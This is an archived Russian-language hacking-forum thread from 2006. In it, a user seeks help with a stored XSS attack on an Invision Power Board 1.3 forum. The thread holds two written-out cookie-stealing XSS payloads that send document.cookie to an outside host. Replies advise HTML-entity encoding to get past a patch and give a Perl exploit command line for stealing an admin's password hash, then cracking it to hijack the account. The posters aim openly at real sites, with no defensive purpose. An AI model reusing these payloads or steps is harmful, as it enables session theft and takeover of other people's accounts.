ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости > Форумы
Перезагрузить страницу Invision 1.3 Xss ?
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Invision 1.3 Xss ?
  #1  
Старый 23.05.2006, 17:26
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию Invision 1.3 Xss ?
Нужна поиощь есть форум

http://forum.низя ссылки.ru

Powered by Invision Power Board(U) v1.3 Final © 2003 IPS, Inc.

На нем я использовал


[E*MAIL][U*RL=wj`=`][/U*RL][/E*MAIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie)`

Дыру закрыли

То ест теперь видя этот XSS Непроисходит никаких действий то есть подпись такой же становится как содержимое XSS

Помогите зашифровать его или другой способ!!

Пробовал через картинку! (Вродь картинку поставил но Hash пароля не пришол) За ранее thank's
Последний раз редактировалось Azazel; 23.05.2006 в 17:35..
 

  #2  
Старый 25.05.2006, 18:31
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию
Попробуй зашифровать некоторые фрагменты сплойта тут:
_http://www.h4cky0u.org/encrypt/index.php
в кодировку HTML Entities
 

  #3  
Старый 25.05.2006, 20:08
em00s7
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613

Репутация: 25
Отправить сообщение для em00s7 с помощью ICQ
Smile
ТЫ не пробывал Этот эксплоит
 

  #4  
Старый 26.05.2006, 18:44
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
Как использовать сплойт на forum.test.ru ID юзера 123
perl 1.pl test.ru /forum/ 123 0

Так?
 

  #5  
Старый 26.05.2006, 18:53
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
Нашол другой XSS

Можно ли его вставиить в картинку ??

wj@wj.com ` style=`background:url(javascript:document.images[1].src="http://antichat.org/s/slider.gif?"+document.cookie);
 

  #6  
Старый 26.05.2006, 19:54
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию
да зачем тебе с XSS париться. Вот паренёк дал сплойт. Запускай вводи типо C:\bin\perl.exe C:\file.pl http://lol.ru forum/ 1 0. И всё хэш админа твой. Теперь в руки passwords pro и ты поимел админа аккаунт.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #7  
Старый 01.06.2006, 13:01
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию
Ладно ЗАКРЫЛИ!

Непрошол exploit
Последний раз редактировалось slider; 01.06.2006 в 13:46..
 
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ